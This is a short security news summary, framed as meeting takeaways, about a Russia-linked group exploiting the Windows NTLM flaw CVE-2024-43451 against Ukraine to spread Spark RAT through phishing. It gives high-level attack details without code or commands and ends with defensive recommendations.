Russian Hackers Exploit New NTLM Flaw to Deploy RAT Malware via Phishing Emails

Russian Hackers Exploit New NTLM Flaw to Deploy RAT Malware via Phishing Emails

November 14, 2024 at 01:33AM

A newly patched Windows NT LAN Manager (NTLM) vulnerability (CVE-2024-43451) was exploited by a Russia-linked actor in attacks on Ukraine, enabling the theft of user hashes via infected documents. The attack involves phishing emails linking to malicious files, leading to potential financial theft within an hour of compromise.

### Meeting Takeaways – Nov 14, 2024

1. **Vulnerability Overview**:
– A newly discovered security flaw, CVE-2024-43451, affects Windows NT LAN Manager (NTLM), with a CVSS score of 6.5.
– The vulnerability has been exploited as a zero-day by actors suspected to be linked to Russia, targeting Ukraine.

2. **Exploitation Details**:
– The flaw allows for NTLMv2 hash disclosure via minimal user interaction (e.g., right-clicking or single-clicking a file).
– Microsoft has released a patch for the vulnerability earlier this week.

3. **Attack Methodology**:
– The exploit is part of an attack chain distributing the Spark RAT malware.
– Malicious files were found hosted on an official Ukrainian government site, prompting phishing attacks.
– Phishing emails imitate requests to renew academic certificates and contain a booby-trapped URL.

4. **Execution and Consequences**:
– Interaction with the malicious URL file can lead to connections with a remote server to download additional malware payloads.
– The attackers can execute Pass-the-Hash attacks once they obtain NTLM hashes, potentially compromising user accounts without needing passwords.

5. **Associated Threat Actors**:
– The Ukrainian Computer Emergency Response Team (CERT-UA) identified the activity as likely connected to a Russian group (UAC-0194).
– CERT-UA also cautioned about another financially motivated threat actor (UAC-0050) using tax-related phishing to distribute remote desktop software, specifically targeting accountants in enterprises using remote banking systems.

6. **Urgent Risks**:
– The timeframe from initial attack to fund theft can be as short as one hour, increasing the urgency for organizations to address these vulnerabilities and enhance their cybersecurity measures.

### Recommendations:
– Organizations should immediately update their systems with the latest Microsoft patches.
– Increased vigilance against phishing attempts is essential, particularly for employees in finance and related fields.
– Regular training and awareness programs about cyber threats should be conducted for staff.

For more updates and exclusive content, follow us on Twitter and LinkedIn.

Full Article